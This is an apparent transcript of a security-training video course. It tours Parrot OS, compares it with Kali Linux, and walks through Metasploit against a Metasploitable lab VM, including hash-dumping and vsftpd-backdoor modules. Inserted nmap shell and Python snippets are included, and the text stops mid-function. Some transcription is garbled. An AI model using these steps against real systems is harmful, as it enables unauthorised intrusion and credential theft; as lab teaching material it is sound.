once you've enabled


you can also check

like I said your IP address now.

So as you can see it says 'Global

Anonymous proxy activated. Dance

like no one's watching, encrypt

like everyone is.' So

basically it's saying

Anonsurf is started.

As you can see my IP address


has been changed it

for something of 160 something.

But right now it's 182.

So Anonsurf has made


me Anonymous now,

I can do whatever you want


in an anonymous mode.

So that's all I wanted to show


you here now back to Firefox.

It has quite
a documentation part.

Well, it's still

in the creation stage here


is you can see documentation.
It's not all that well prepared
or created yet.

So if you have any minor doubt

you can go ahead and refer

to the documentation part.

Oh, so here you go.

Okay, then let's go


back to the distro.

One thing that you can point out


about Parrot OS is

that it has a lot


of cryptography tools such as

it has zuluCrypt, zuluMount,


a graphical utility

that will help you mount


your encrypted volumes.

Then there is something


called Crypt Keeper.

It's another graphical utility

that allows you to manage


encrypted folders and much more.

These utilities
make confidentiality

easily accessible to anyone

with minimal experience.

I mean if you do not have


any idea about cryptography you

can easily start learning here;


that's what I meant.

So it just doesn't stop

with cryptography or Anonsurf;


you have lot of other tools

which you might not find


in Kali Linux.

So let me show
you guys that part

as you can see you have lot of


tools you have most used tools,
which is Armitage.

You have Wireshark, Zenmap,

OpenVAS and all

that then you have


wireless testing tools.

Give me a second.

Yeah, post exploitation this set

of tools mostly you can't find


them in the Kali Linux.

You have OS backdoor

tools, web backdoor tools.

You have Weevely

and all that

and you have something called


social engineering kit.

If I'm right.

It should be
in the exploitation tools.

Whereas exploitation here

how you can see a social


engineering tool kit just click

on that password.

So it is started up all that.

So if I just click one,

you have a lot of options


the update set configuration, you

have social engineering

attacks, you have different types

of attacks here.

You have power


shell attack vectors.

You have mass mailer attack

you have phishing


attack vectors and all that.

So basically you can click


on that and enable all
those attacks; I'm not going to show you
in this demo how to do it.

This is just the basic


introductory video

about Parrot OS.

So, let me just


close the terminal

while there are common tools


like you have nmap.

I'm sure you know


how to use nmap.

Let me just show you anyway,

and nmap is one

of the scanning tools.

You can find it

in information gathering.

I'm sure nmap

is here; it's one

of the basic tools.

Okay, let's just explore nmap

and dmitry here.

Let me just show you

how to use nmap. First just

click nmap; you have

all the help, or the

nmap configuration options

are displayed in front of you.

If you don't know how to use it,

just go through them.

It's pretty easy


a simple example.

I'm already using the one


which is already there.

Just say scanme.nmap.org.

Okay, here I go making a

spelling mistake again.

Sorry about that.


It's gonna take a little while.

That's all while it's scanning.

Let me just show


you another tool,

which is Dimitri.

It's a deep magic


information gathering tool.

It has ability.

So here it is.

It should be in the information

gathering only you


have your here goes.

So basically, like I said,

it has ability to gather as


much information as possible

about a hose subdomains.

It's email and


formation TCP port scan

who's look up and all that.

Let's just check whether the nmap scan is done. Here is the terminal. Yeah, it's going to take a little while. So once the scanning is done, it's going to show you how many seconds it took, which ports are open and which are closed, and all that. Now about DMitry: you can launch it from your terminal, but you can also do it from here, Information Gathering, and click on DMitry, then enter your password.

So let's see. Here we go. Let me maximize. You have a lot of options here. You have -w, which performs a whois lookup. You can do that online using Firefox as well; there are a lot of websites where you can gather all that information once you have the IP address. And you have -n, which retrieves Netcraft.com information on the host, -s, which performs a search for possible subdomains, -e for possible email addresses, and all that. So basically you can give all these options in one go.

Let's try the -o option: it saves the output to %host.txt or to the file specified by -o. So I just type -o; let me just give it sudo. Let me just check whether I've given any file here. I do have a file called test.txt. Okay. So like I said, with the -o option it will save your output to the %host.txt file or to the file specified after -o. So basically you just specify the filename where you want to store all the scan info, and then the website whose information you want to scan. So let's say www.pinterest.com.

Here you go, it started scanning. Let me just scroll up. The host name and the host IP address are showing. Once you have the IP address, you can gather almost all the information. It's also showing the places where it's registered: created, last modified. You have sources, you have the address here, and then last modified, created, sources and all that. So basically it's showing a lot of information here. Similarly, using DMitry, the Deepmagic Information Gathering Tool, you can gather information about any other website you want to know about. Let's just check whether nmap is done scanning.

So, as you can see, it's done. I've given a website name here; instead of that you can go ahead and give the IP address, which is this one, and it will show you the same results. As you can see there are a lot of ports; usually an nmap scan covers more than a thousand ports. As you can see it says 992 closed ports, and these are the open ports. Suppose you want more information about each port, because basically if you are a hacker, if you try to hack something, you don't need information about all the ports; it's basically the one port which you want. To get that, there are a lot of options which are provided by nmap. If you want to know more about nmap, there's a video in the Edureka playlist all about nmap; it's under network security, so make sure to take a look at that.
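As an added example, not from the video, here is what the point above looks like in practice: you rarely care about all thousand ports, only the open ones, so the script parses nmap's grepable output (-oG) and builds the targeted version-detection scan for just those ports. The sample scan output, the IP and the open ports are constructed for illustration, not real scan results, and the follow-up command is only printed, never run.

```shell
#!/bin/sh
# Added example (not from the video): turn a full nmap scan into a targeted
# follow-up scan. Extract the open TCP ports from nmap's grepable output (-oG)
# and build an `nmap -sV` command restricted to those ports.

# Constructed sample of `nmap -oG - scanme.nmap.org` output (not real scan
# data; the IP and port states are illustrative). Fields are space separated
# here; real -oG output uses tabs, which the sed below also accepts.
SAMPLE_GNMAP='# Nmap 7.80 scan initiated as: nmap -oG - scanme.nmap.org
Host: 45.33.32.156 (scanme.nmap.org) Status: Up
Host: 45.33.32.156 (scanme.nmap.org) Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 135/filtered/tcp//msrpc///, 9929/open/tcp//nping-echo///, 31337/closed/tcp//Elite/// Ignored State: closed (992)
# Nmap done at ...'

# open_ports: read grepable nmap output on stdin and print the open TCP ports
# as a comma-separated list, e.g. "22,80,9929". Filtered and closed ports are
# dropped, matching the video's point that only the open ones matter.
open_ports() {
  grep 'Ports:' |
    sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' |
    tr ',' '\n' |
    sed 's/^[[:space:]]*//' |
    awk -F/ '$2 == "open" && $3 == "tcp" { printf "%s%s", sep, $1; sep="," }'
}

# followup_scan_cmd TARGET PORTS: build (but do not run) the targeted
# service/version scan. Only run it against hosts you are authorised to test.
followup_scan_cmd() {
  printf 'nmap -sV -p %s %s\n' "$2" "$1"
}

PORTS=$(printf '%s\n' "$SAMPLE_GNMAP" | open_ports)
echo "open ports: $PORTS"
followup_scan_cmd scanme.nmap.org "$PORTS"
```

The same pipeline works on a saved file (`open_ports < scan.gnmap`), and feeding the result straight into `-p` keeps the second, slower `-sV` scan from touching the 992 closed ports again.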

So while you are taking a look at Parrot OS, make sure you go ahead and watch the video on Kali Linux as well, so you will know how different Parrot OS and Kali Linux are, though they are similar in a few parts. So that's it about Parrot OS. Like I said, it's a good-looking distro which is lightweight when compared to Kali Linux, with a lot of tools, a lot of unique tools as well when compared to Kali Linux, and it's very smooth. Apart from all these good things, there are a few things that are problematic with Parrot OS. First of all, you don't find a search bar. That's not a big problem, but you can say it's one demerit. It's also a little problematic when it comes to launching your applications: the process is a little slow, unlike Kali Linux. So guys, this is your Parrot OS. This was a crisp video on what Parrot OS is, its review, its features and all that. Make sure to watch the video on Parrot OS versus Kali Linux.

Linux has been known for its various distributions that cater to various needs. One of the most famous distributions is Kali Linux, a penetration testing oriented distribution which was built to bring much-needed corrections to its predecessor, known as BackTrack. Since the release of Kali Linux it has gone through various iterations in the form of updates, while other penetration testing and security related distributions were also being developed all around the world. So in this session we will compare Kali to one such distribution that has come under the spotlight, and that is Parrot OS. Today in this video I will first be giving you guys a brief introduction to what exactly Kali Linux is, then I will also give a brief introduction to what Parrot OS is, and then we will be comparing Kali versus Parrot according to various parameters.

So let's move ahead now. Let me give you guys a brief introduction to what Kali Linux is. Kali Linux is a penetration testing and security focused operating system. As the name suggests, Kali has a Linux kernel at its core; above that, the creators of Kali, Mati Aharoni and Devon Kearns, added the latest wireless injection patches to help pentesters save some time. Kali Linux was developed according to the Debian development standards, and it was developed as a refined penetration testing distribution that would serve as a replacement for BackTrack. Currently the development of Kali is being handled by Offensive Security, which is the organization that provides prestigious certifications like OSCP, OSCE and OSWP.

Over the years Kali has developed its own cult following, with people who swear by the word and by the power provided by Kali. While I may not be such a staunch believer in Kali Linux, there are plenty of reasons for one to use Kali. For one, it's absolutely free. Secondly, it comes pre-installed with tons and tons of penetration testing tools and security related tools. Above that, it can be completely customized according to your needs, as the code is in an open-source Git tree and the whole code is basically available to the public to be tweaked. Also, the kernel that runs Kali Linux comes with the latest injection patches, and it also comes with GPG-signed packages and repositories. Above that, Kali Linux has some true multi-language support, and it was developed in an extremely secure environment. Also, Kali supports a wide range of wireless devices. Now at this moment Kali may seem like a very useful operating system.

But as you guys might remember the great quote from Spider-Man: with great power comes heavy resource utilization. According to the official documentation of Kali, the system requirements are quite heavy. On the low end, Kali Linux needs a bare minimum of 128 MB of RAM and 2 GB of hard disk space to set up a simple SSH server that will not even have the desktop GUI. On the higher end, if you opt to install the default GNOME desktop and the kali-linux-full meta package, you should really aim for at least around 2 GB of RAM and around 20 GB of free hard disk space. Besides the RAM and hard disk requirements, your computer needs to have a CPU supported by at least one of the following architectures: amd64, i386, armel, armhf and arm64. Now, even though the official documentation says 2 GB of RAM is enough, I have personally faced numerous lag and stutter issues when running Kali on a virtual machine with 6 GB of allocated RAM, which in my opinion is a definite bummer.

Now, let's take a moment to discuss Parrot OS. Parrot, much like Kali, is also a Debian based distribution of Linux. When I say Debian based, it means that the code repositories adhere to the Debian development standards. Parrot OS too comes with its own arsenal of penetration testing and security related tools; most of these tools are also available on Kali. Parrot was first released in 2013 and was developed by a team of security experts, Linux enthusiasts, open source developers and advocates of digital rights. The team was headed by Lorenzo Faletra, and Parrot is designed in a very unique way: while the operating system has everything that is needed for a security expert, it doesn't present itself as a daunting learning experience for beginners who want to set foot into the world of ethical hacking and vulnerability analysis. Parrot OS can very well be used as a daily driver, as it provides all of the necessary tools to complete day to day tasks.

So who exactly is Parrot OS made for? Well, first of all, it is made for security experts and digital forensics experts. It can also be used by engineers and IT students who are enthusiastic about ethical hacking. Then Parrot OS can also be used by researchers, journalists and hacktivists, and last but not least, Parrot OS is also meant for police officers and special security institutions.

Okay. So now let's take a moment to actually discuss the system requirements that one might need to run Parrot OS. The system requirements for Parrot are much more forgiving than Kali Linux. On the CPU side, you need an x86 architecture with at least 700 MHz of frequency, and architecture wise you need i386, amd64 or 486, which are basically the x86 architectures, or armel and armhf, which are basically IoT devices like the Raspberry Pi. On the RAM side you need at least 256 MB on an i386 architecture and 320 MB on an amd64 architecture, and as general guidance 512 MB of RAM is recommended by the Parrot Sec OS people. On the GPU side Parrot OS is very surprising as it needs no graphics acceleration; that means you can run it without a graphics card. On the hard disk side, Parrot OS needs at least 16 GB of free hard disk space for its full installation, that is 4 gigabytes less than Kali Linux. And for booting options, both Kali Linux and Parrot OS prefer legacy BIOS.

Now, comparing two operating systems becomes really tough when it comes to Parrot OS and Kali Linux, which are both operating systems meant for similar purposes, that is penetration testing. Most of the factors in such cases boil down to a matter of personal taste rather than an objective comparison. Before we move ahead with the comparison, let me list a few similarities that you might have noticed between the two operating systems. First of all, both operating systems are tuned for penetration testing and network related tools, and both are based on Debian development standards. Both operating systems support 32 and 64-bit architectures, and both also support cloud VPS along with IoT devices. And of course, both of them come pre-installed with their own arsenal of hacking tools.

Now, let's get down to the differences. The first criterion of difference that we are going to discuss is hardware requirements. As you guys can see on the slide, I have put the system requirements of Parrot OS on the left hand side and the system requirements of Kali Linux on the right hand side. So as you guys can see, Parrot OS and Kali Linux both need a 1 GHz dual-core CPU. When it comes to RAM, Parrot OS needs much less RAM than Kali Linux: Parrot needs 384 MB of RAM for its minimal running, and Kali Linux needs 1 GB of RAM. In terms of GPU, Parrot OS doesn't really need a graphics card as it has no need for graphical acceleration; Kali Linux on the other hand, if you're trying to run the GNOME desktop version, will certainly need a graphics card. Parrot OS needs 16 GB of free hard disk space for its full installation and Kali Linux needs 20 GB of free space. So basically Parrot OS is a much more lightweight version. So we see that Parrot OS definitely wins against Kali Linux when it comes to hardware requirements due to its lightweight nature: not only does it require less RAM to function properly, but the full installation is also pretty lightweight, thanks to the use of the MATE desktop environment by the developers. So basically, if you have an older hardware configuration on your computer, Parrot OS should definitely be your choice.

Now the next parameter that we are going to compare the two OSes on is look and feel. This section boils down to personal choice. Personally, I prefer the minimalistic look that is given by Parrot OS. The interface of Parrot OS is built using the MATE desktop environment. There are two clear sections: on top you see a pane which contains Applications, Places and System, which is much like Kali itself, but it also gives some cool information about CPU temperatures along with the usage graph, and the bottom pane contains the menu manager and the workspace manager, which is a brilliant addition to the Linux system. Kali Linux on the other hand follows the GNOME desktop interface; while it still has the functionality that is offered by Parrot OS, it doesn't provide the same clean and refined look in my opinion. If you don't know your way around a Kali interface, it is pretty easy to actually get lost.

Now, the next parameter that we're going to compare them on is hacking tools. Since both these operating systems are for penetration testers and ethical hackers, I think hacking tools is the most important criterion that both operating systems are going to be compared on. So when it comes to general tools and functional features, Parrot OS takes the prize when compared to Kali Linux: Parrot OS has all the tools that are available in Kali Linux and also adds its own tools. There are several tools that you will find on Parrot that are not found on Kali Linux. Let's take a look at a few of them.

The first one that you see is called Wifiphisher. Wifiphisher is a rogue access point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can further be used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials or infect the victim with some sort of malware.

Another tool that is seen on Parrot and is much appreciated, but is not seen on the Kali side, is called Anonsurf. Being anonymous is the first step for a hacker before hacking a system, and anonymizing a system in an ideal way is not an easy task. No one can perfectly anonymize a system, and there are many tools available on the internet that claim that they can anonymize a system. One such tool is Anonsurf. Anonsurf is pretty good as it uses Tor and iptables to anonymize the whole system. Also, if you guys have not already realized, Tor also comes pre-installed on Parrot, while it has to be installed separately on Kali. Now, these things that you see, that is Wifiphisher, Tor Browser and Anonsurf, surely can be downloaded and installed on Kali, but they don't come pre-installed, and that is what counts right now. Since Parrot OS is also designed with development in mind, it also comes pre-installed with a bunch of useful compilers for various languages and IDEs for their respective development, which is completely absent on the Kali Linux side. So for this part, hacking tools, Parrot OS definitely takes


the prize. Now the next thing that we are going to compare both these operating systems on is release variations. Both operating systems come with a variety of variations, but Parrot OS has much more diversity in terms of variety. So let me just explain what I mean. As you guys can see on the left-hand side, I have listed the release variations that are available for Parrot OS. Aside from the full editions, which are provided by both Parrot and Kali, they also both provide light editions: the Lite edition on the Parrot side and the Light edition on the Kali side. They are both basically the same thing, wherein a minimal set of tools is pre-installed and you can install and customize the operating system according to your own needs. If you don't choose to customize the operating system, you can very well use it as a very lightweight and portable operating system. So the Parrot OS Lite edition and the Kali Light edition are two flavors of the operating system.

Now, this is where the differences start. A Parrot OS Air edition also exists. This is an edition that is used for wireless penetration testing and wireless vulnerability testing; basically, anything wireless, the Parrot OS Air edition does faster and better. Then there's also the Parrot OS Studio edition, which is used for multimedia content creation. Yes, you heard that right: Parrot OS can also make content for your social media. So if you're thinking about using Parrot OS for marketing as well as security, Parrot OS is definitely your go-to operating system. Kali on the other hand, aside from its light version and full edition, offers some desktop interfaces like E17, KDE, Xfce, MATE and LXDE. These are basically just skins that run over Kali and make Kali look a little different from one another; you can check out all these different customizations in the Kali documentation. Other than that, Kali also has support for cloud and IoT devices in the form of the armel and armhf releases. These releases are also available in Parrot OS, so Parrot OS doesn't stand down. So as you guys see, Parrot OS provides you a lot of diversity in the variety that it is offering. So in my opinion Parrot OS also takes the prize in this section.

Now the main question remains: which of these two distributions is better for beginners? Well, it is to be duly noted that both these distributions are not exactly meant for beginners. If you want to learn about Linux as an operating system, you're better off using something like Ubuntu or Debian. This also doesn't mean that you cannot learn the basics on Parrot or Kali. On the other hand, if you already know the basics of Linux and want to get your hands on an operating system to learn ethical hacking, I would personally recommend using the Parrot Sec OS Lite edition. This is because the Lite version comes with the bare minimum of networking tools. This means that as you slowly learn your ethical hacking concepts, you can develop or install tools one by one instead of being overwhelmed with a whole bunch of them from the beginning. Not only does this allow you to evolve as an ethical hacker and penetration tester, but it also makes sure your fundamentals are built in a methodical manner. Now, I recommend Parrot OS over Kali for one other reason too, and that is because the default user for Kali is root. This makes the environment a whole lot more aggressive, and mistakes tend to be punished and are a whole lot more difficult to deal with. (Since Kali 2020.1 the default user is a non-root account, so this point applies to the older Kali releases this comparison was made against.) So this means that Parrot OS is generally the winner, in my opinion.

When you get hired as a penetration tester or a security analyst, one of the main roles is vulnerability assessment. So what exactly is vulnerability assessment? Well, vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures, and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately to them. So a vulnerability is a situation that can be taken advantage of by a hacker or a penetration tester, either for their own misuse or actually for fixing the issue. Vulnerability assessment has three steps. The first step is identifying the assets and the vulnerabilities of the system. The second step is quantifying the assessment, and the third is reporting the results. Now, vulnerability assessment is only a small part, and pen testing is an extended process of vulnerability assessment: pen testing, or penetration testing, includes processes like scanning, vulnerability assessment itself, exploitation, research and reporting whatever the results are.

So in the industry, one of the most widely used frameworks for penetration testing is Metasploit. Metasploit is widely used in penetration testing, as I just said, and is also used for exploitation research. Some of you might ask what exactly exploit research is. Well, in this world there are tons of exploits, and the way to approach each of them is ever so different. So what we have to do is exploit all the research that is available to us and find the best way to approach them. Suppose, for example, you have a secure shell login. The best way to actually approach a secure shell login, to my knowledge, is that you have to get backdoor access to it through the port numbers that you can scan via nmap or Zenmap. Okay. So without wasting much time looking at PowerPoint presentations, let's actually get started on how we can use Metasploit.

So Metasploit is a freely available open source framework that is widely used by pentesters, as we just discussed. To actually install Metasploit, which is easily available on Linux and Windows, let me just check it out. You go to your browser and you type Metasploit downloads; now you just visit the first link, and as you guys can see it says it's the world's most used penetration testing tool, and then you just download the Metasploit Framework by clicking the download button here. You might also find the Pro version, which is a paid thing; this has a few extra features like group support and helping a company work as an organization, but we don't actually need that for practicing our pentesting abilities. So for that you just go ahead and download the Metasploit Framework and install it on your system.

Above that, there is another thing I want to make you guys aware of, and that is Metasploitable. When actually pen testing we need a server or a website to pen test on. Normally this is a very illegal thing to do without permission, so the Metasploit project has actually created a server with a lot of vulnerabilities on it, and it's called Metasploitable. Metasploitable 2 is easily downloadable from this link, and it's a VirtualBox file, so you must have virtual machine software on your system to actually set this thing up. I'll also go through how to actually set up Metasploitable, because it has a lot of configuration and network management to go with it. We'll get to that later, but for now let's get started with Metasploit. Before that: Metasploit is written in Ruby, and if you know Ruby coding and know how to make exploits, you can always contribute to the Metasploit community.

So Metasploit is one of the most widely used pen testing tools in the industry. What exactly is Metasploit? Well, it's a framework, and what a framework is, is actually a collection of tools. These tools are majorly used for penetration testing and exploitation research. Now one might ask what exactly exploit research is. Well, there are tons of exploits out there and there are tons of ways to actually approach them, and this only comes to us from thorough research as to how we can approach each and every exploit in the best way. So talking about Metasploit, well, it's open source and free, and it's also written in Ruby. So if you guys know Ruby coding and know how to make exploits, you can always contribute to the Metasploit Framework.

Now talking about the download part, you can easily download Metasploit from its download page, which is metasploit.com/download; I'll be leaving the download link in the description. Once you're on the download page, you'll see two versions: one is the free version, which is the original Metasploit Framework, the core framework that everybody works on, and then there's Metasploit Pro, which comes with a 14 day free trial. Metasploit Pro has a few extra features which are great for an organization, like helping you work as a team, but if you're a guy who's just practicing pentesting like me, the free Metasploit Framework is the absolute way to go. Also, when pentesting you will need Metasploitable. Metasploitable is an intentionally vulnerable target machine for actually practicing your Metasploit skills on. We will go over the installation of Metasploitable later, but for now let's go over Metasploit.

So once you guys have actually downloaded it from the link, you can install it on your systems. Metasploit actually has three interfaces. We are going to be using the command line interface, or msfconsole in other words, but you can also use the GUI interface, which is called Armitage if I'm not wrong. So let's get started. First of all, I've already downloaded Metasploit and installed it on my computer, and you can do the same by pressing the download button as you guys can see. To start up Metasploit, all you have to do is go to your terminal on Linux. Well, first we're starting up the PostgreSQL server, because Metasploit uses the PostgreSQL database to store its data (hosts, services, loot and the module cache), and starting it first makes things like module searches run faster. So we type service postgresql start; that starts the service, and indeed it has. The next thing you want to do is type msfconsole. That's going to take a little bit of time because I have a very slow computer, and it's going to start up our Metasploit Framework. As you guys can see you've got a big banner out here; it says Metasploit cyber missile, and the banner changes every time, so don't get worried if you have a different banner. The main thing is that you should see this msf prompt out here. This means we are in the msf shell right now, which is the Metasploit Framework shell.

So let's get started by actually clearing our screen. First things first, the first command that you might want to run on Metasploit is the help command. help will tell us everything that we can do with this framework. As you guys can see there are a bunch of commands and the descriptions to go along with them; you can give it a quick read and find the things that are interesting to you. As you guys can see, banner displays an awesome Metasploit banner; you can change the banner. There are a lot of juicy commands, like the banner command, which I just used: if you type banner it will give you a nice cool banner about Metasploit. And there are other commands which work very similar to Linux, like cd, which changes the current directory; you can change the colour by toggling colors, and then you can connect to a host and all sorts of stuff.

So Metasploit has a bunch of exploits. Before we go further, I want to make you guys aware of three important terms regarding Metasploit. The first is a vulnerability, and we have already discussed this: a vulnerability is a situation which can be taken advantage of by a system or a person who accesses it. The second term is an exploit. So what exactly is an exploit? Well, an exploit is a module, which is a bunch of code written in Ruby on Metasploit, that is used to target a particular vulnerability. And the third thing is a payload. A payload is the code that runs on the target once the exploit succeeds, in other words the action that you perform once you actually have access to somebody's system. So basically, suppose you have hacked somebody and you've gained access to their system: the activities you do after gaining access are defined by the payload. So we just spoke about exploits, and I told you guys that Metasploit has a bunch of them, right?

So how do we see all the exploits that are there? You type show exploits. Well, as you guys can see we've loaded up a bunch of exploits, which is basically all the exploits that Metasploit has to offer at this moment. Let me just increase the screen a bit and scroll completely to the top. Yep. So as you guys can see, show exploits gives us a bunch of exploits and shows the name, a description, a disclosure date and the rank. The name and description are as they say: the name of the exploit and a short description of it. The disclosure date is when the vulnerability that the exploit targets was publicly disclosed, and the rank indicates how reliably the exploit works against that vulnerability, so the ranks range from excellent through great, good, normal and so on. And we have a bunch of exploits: as you guys can see there's an Android exploit, there's a Samsung Galaxy Knox Android exploit, there are a bunch of Windows exploits, Adobe Flash exploits, FTP exploits, MySQL exploits, ASP.NET exploits and a bunch of other stuff. So as you guys can see there are a bunch of exploits to use, and it can get confusing and rather troublesome to search for the exploit you actually want to use. So as a pen tester you can always go for the search keyword. Suppose you know that you have a MySQL server which has a bunch of vulnerabilities and you want to test those out: you simply type search mysql. Now it'll search the database for all the modules that are related to MySQL and present them to you.

Okay, so we have our results. As you guys can see we have a bunch of MySQL related modules here. This makes it very easy if you are a pen tester and you're looking for MySQL exploits. Now suppose you choose your module; let's see, which one do we want to use today? We're going to just use this MySQL hashdump. To actually use this we have to copy the name: double-click on it and it'll select it, then press Ctrl+Shift+C in your terminal so that it copies it. If you want some more information about it, you can always type info and then just paste in the name of the module. This gives us a bunch of information; actually it gives us all the information you need about the module. It gives you the name, that it's a MySQL Password Hashdump; its module path is auxiliary/scanner/mysql/mysql_hashdump and all this stuff; it's licensed under the Metasploit Framework license, and it has a normal rank. These are all the options that you might need to set when actually using the module, and it also gives you a small description. It says this module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. So it seems like really cool stuff you can do with a MySQL server and its password database.

So if you actually
want to use this

so you have to use


the use keyword.
So we go you Who's
and control shift V?

As you guys can see, it's denoted in red out here that we are indeed in the module that we want to use. Now, the first thing you want to do when you're using an exploit is to go and say show options. As you guys can see, these are the options that we actually need to set before using the exploit. Now the options can be necessary or they can be optional. For example there's a password field out here which is not really necessary but will help your exploit if you actually provide it, but you do need to provide RHOSTS, which is the target host machine, and the port, and the threads are already set. Suppose you want to set RHOSTS: you can just go set RHOSTS and set it to whatever IP address you want, like suppose you want to address 192.168.1.156 or something like that. That will set RHOSTS. You can also set the number of threads. Threads are about parallel processing: they mean how many parallel threads you're going to run so that you have faster computation. This means you need more processing power if you have multiple threads running. So let's set THREADS to 30. Now that we've set the threads to 30, you can go show options again and see that you have indeed set your options. So we've set the threads to 30 and RHOSTS has also been set.

So that was all about how you can get into a module, get some information about a module and how you can also use them. Once you're done setting up the options, you can go ahead and run the command run, or even exploit, and this will actually start running the exploit on the system that we want. Now, I've put in a very arbitrary IP address that does not have a MySQL port running, so our exploit fails. Once you're done with the exploit and you want to go back to the main msfconsole shell, just go ahead and type back. It's as simple as that, and that brings us back to the msf command line. So let's go ahead and clear our screen now.

Okay, so it's time to do something interesting. To do that, first of all, we need to go ahead and actually download Metasploitable 2. To download Metasploitable 2 you have to go on this link; I'll leave the link in the description. Or rather, you can just go on your browser and type in Metasploitable 2 download. Metasploitable, as we had earlier discussed, is a Linux based distribution and it's mostly meant for actually practicing your pen testing skills. Basically it has a bunch of ports open on it. It's basically just for your use, so that you don't go ahead and test it out on some valid website and then get thrown into jail, because that's a very illegal thing to do.

So go ahead and download Metasploitable 2 and then also download Oracle VirtualBox. You can easily download that from www.virtualbox.org. This is because you should never run Metasploitable 2 on a system that is connected to a network. You should always use it on a virtual machine, because there it's protected in a way that nobody else can access it.

To actually set up Metasploitable, once you've downloaded it, you go ahead and open up your VirtualBox. Out here you have to go into Global Tools, the Host Network Manager, and create a host-only network. I've already created a host-only network, and then you go ahead and enable the DHCP server by pressing this out here, Enable. Then you go back and you just go New. You give it a name, whatever you want to name it; I have already named mine Metasploitable 2, as you guys can see. We're going to call this one demo, just for demonstration purposes. Choose the type to be Linux and the version to be Ubuntu 64-bit, click Next, give it a gig of RAM, and you are going to use an existing virtual hard disk. So out here you just click on this button and browse to the place where you actually downloaded and unzipped your Metasploitable download file. Then you get this virtual machine disk file, which is the .vmdk file, and you just go ahead and load it up. I'm not going to do that again because that's just going to eat up my RAM, and I've already installed it, as I told you. So that was all about the installation and the configuration. Now let's get started and let's start playing around with Metasploit.

Once you're done downloading and installing Metasploitable on your computer, all you have to do is go ahead and start it up in your VirtualBox machine, and the login ID and the password are both msfadmin. First of all, we need the IP address of our Metasploitable server, so we go ifconfig and this gives us the address. As you can see out here, our address is 192.168.56.101. Once you've gone ahead and started Metasploitable, it's time that we go ahead and exploit all the vulnerabilities that are presented to us by Metasploitable 2. To do that, let's head back to our Linux terminal again.

So once we have the IP address, which was 192.168.56.101 if I am correct, let's go and quickly get a little bit of information about it. So whois 192.168.56.101 will give us the whois for Metasploitable 2 and a bunch of information as to how the server is set up, where it is set up, which ports are open and various other things. As you guys can see this gave us a complete whois. To get some more information about our Metasploitable server, we're going to be using nmap. If you guys don't know how to use nmap, you can go out and check my other video on the playlist; I've made a pretty good nmap tutorial. So we go nmap -F -sV, where -sV is service version, and we give it the name or the domain name of the server, 192.168.56.101.

So we've got a juicy result out here and we can see that there's a bunch of stuff open. As you guys can see there's the FTP port open, which has a version of vsftpd 2.3.4. There's also OpenSSH, which is 4.7p1 Debian. There's also telnet, and it's almost miserable to have telnet running on your computer. Then there's SMTP, there's HTTP, and there's a bunch of ports open as you guys can just see on your screen.

So it's time we actually used Metasploit like a pen tester to go ahead and test out these vulnerabilities. Let's choose the FTP one. We have this FTP out here, and from the version number, which is given to us by the -sV service version flag on nmap, we know that it's using vsftpd 2.3.4. So we can easily search for an exploit for the same version. As a pen tester you would go search vsftpd 2.3.4, and this should give us all the exploits that are available for this particular vulnerability. As you guys can see, after a long search from search vsftpd, we found a vulnerability, or rather an exploit that can take advantage of the binary. So it's time we actually use this.

First of all, let's get some info about this: info, then let's copy down this thing and get some info about it. As the small module description says, this module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th and... voilà. So we have the option of setting RHOSTS, it has an available target provided by these guys, and it's a pretty good exploit in my opinion. So let's go ahead and use it: we go use and paste the exploit. It's visible to us that we've again entered an exploit module, which is exploit/unix/ftp/vsftpd_234_backdoor. So what we're going to do is actually gain backdoor access to our Metasploitable system.
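As an added, defender-side illustration of this step (example code, not from the course): a small Python parser for the nmap -sV output shown above that turns each port line into a record, then flags the banner the tutorial goes on to exploit (vsftpd 2.3.4) and any cleartext login service such as telnet, so the same scan drives a patch list instead of an attack. The sample scan text and the known-bad banner table are constructed for this example; nmap's own label for a port that a firewall blocks is "filtered".

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample of `nmap -F -sV` normal output for a Metasploitable 2
# style host; written for this example, not captured from the course. One
# closed and one filtered port are included so every port state is seen.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.56.101
Host is up (0.00042s latency).
Not shown: 93 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          vsftpd 2.3.4
22/tcp   open     ssh          OpenSSH 4.7p1 Debian (protocol 2.0)
23/tcp   open     telnet       Linux telnetd
25/tcp   open     smtp         Postfix smtpd
80/tcp   open     http         Apache httpd
135/tcp  closed   msrpc
445/tcp  filtered microsoft-ds
Service Info: OS: Unix
"""


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str


# One port line: "<port>/<proto>  <state>  <service>  [version text]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*\S))?\s*$"
)


def parse_nmap(output: str) -> list[PortEntry]:
    """Turn the port table of nmap's normal output into PortEntry records."""
    entries = []
    for line in output.splitlines():
        m = PORT_LINE.match(line)
        if m:
            entries.append(PortEntry(int(m["port"]), m["proto"], m["state"],
                                     m["service"], m["version"] or ""))
    return entries


def state_counts(output: str) -> dict[str, int]:
    """How many ports nmap reported in each state."""
    counts: dict[str, int] = {}
    for e in parse_nmap(output):
        counts[e.state] = counts.get(e.state, 0) + 1
    return counts


# Banners this tutorial singles out. The vsftpd entry names the Metasploit
# module the course uses against it, so the finding maps straight to the fix.
KNOWN_BAD_BANNERS = {
    "vsftpd 2.3.4": "backdoored release (exploit/unix/ftp/vsftpd_234_backdoor); upgrade vsftpd",
}
CLEARTEXT_LOGIN_SERVICES = {"telnet", "ftp"}


def review(output: str) -> list[tuple[int, str, str]]:
    """Return (port, category, reason) findings for open ports only; closed
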